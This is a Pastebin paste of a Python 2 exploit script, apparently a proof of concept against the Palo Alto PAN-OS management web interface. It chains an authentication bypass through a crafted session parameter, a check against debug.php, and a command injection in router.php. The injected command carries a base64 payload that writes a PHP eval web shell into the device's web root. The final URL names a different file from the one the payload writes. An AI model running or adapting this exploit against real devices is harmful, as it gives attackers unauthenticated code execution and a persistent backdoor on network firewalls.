Advertisement
Guest User

panos-rce-poc-v1.py

a guest
Mar 13th, 2018
1,085
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.05 KB | None | 0 0
  1. import urllib
  2. import urllib2
  3. import ssl  
  4. import sys
  5.  
  6. ssl._create_default_https_context = ssl._create_unverified_context
  7.  
  8. domain = "192.168.1.1"
  9.  
  10. #pass auth
  11. print "step 1: pass_auth"
  12. pass_auth_url = "https://" + domain + "/esp/cms_changeDeviceContext.esp?device=1024:bbbb'\";user|s:"
  13. print "pass_auth request:    " + pass_auth_url
  14. request = urllib2.Request(pass_auth_url)
  15. response = urllib2.urlopen(request)
  16. print "pass_auth respone:    " + response.read()
  17. session_start_index = response.headers['Set-Cookie'].find("PHPSESSID")
  18. if session_start_index == -1:
  19.     print "pass_auth fail!!"
  20.     sys.exit()
  21. session = response.headers['Set-Cookie'][session_start_index:]
  22. session = session[:session.find(';')]
  23. auth_headers = {
  24.  'Cookie':session,
  25.  'Connection':'keep-alive'
  26. }
  27.  
  28.  
  29. print "\n"
  30. print "step 2: check if pass auth"
  31. auth_url = "https://" + domain + "/php/utils/debug.php"
  32. print "auth_url request:    " + auth_url
  33. request = urllib2.Request(auth_url, headers = auth_headers)
  34. response = urllib2.urlopen(request)
  35. content = response.read()
  36. #print content
  37. if "Debug" not in content:
  38.     print "pass auth fail!!"
  39.     sys.exit()
  40. print "pass auth success!!"
  41.  
  42.  
  43. print "\n"
  44. print "setp 3: create dir"
  45. create_dir_url = "https://" + domain + "/php/utils/router.php/Administrator.get"
  46. print "create_dir request:    " + create_dir_url
  47. post_data = "{\"action\":\"PanDirect\",\"method\":\"execute\",\"data\":[\"07c5807d0d927dcd0980f86024e5208b\",\"Administrator.get\",{\"changeMyPassword\":true,\"template\":\"asd\",\"id\":\"admin']\\\" async-mode='yes' refresh='yes' cookie='../../../../../../opt/pancfg/mgmt/logdb/traffic/1/* -print -exec python -c exec(\\\"Zj1vcGVuKCcvdmFyL2FwcHdlYi9odGRvY3MvcG9jLnBocCcsICd3Jyk7Zi53cml0ZSgiPD9waHAgQGV2YWwoJF9QT1NUWydqYmZjd2FzaGVyZSddKTs/PiIpO2YuY2xvc2UoKTs=\\\".decode(\\\"base64\\\")) ;'/>\\u0000\"}],\"type\":\"rpc\",\"tid\":713}"
  48. request = urllib2.Request(create_dir_url, headers = auth_headers, data=post_data)
  49. response = urllib2.urlopen(request)
  50.  
  51. print "\n"
  52. print "15 minutes later, visit https://" + domain + "/vudrc.php"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement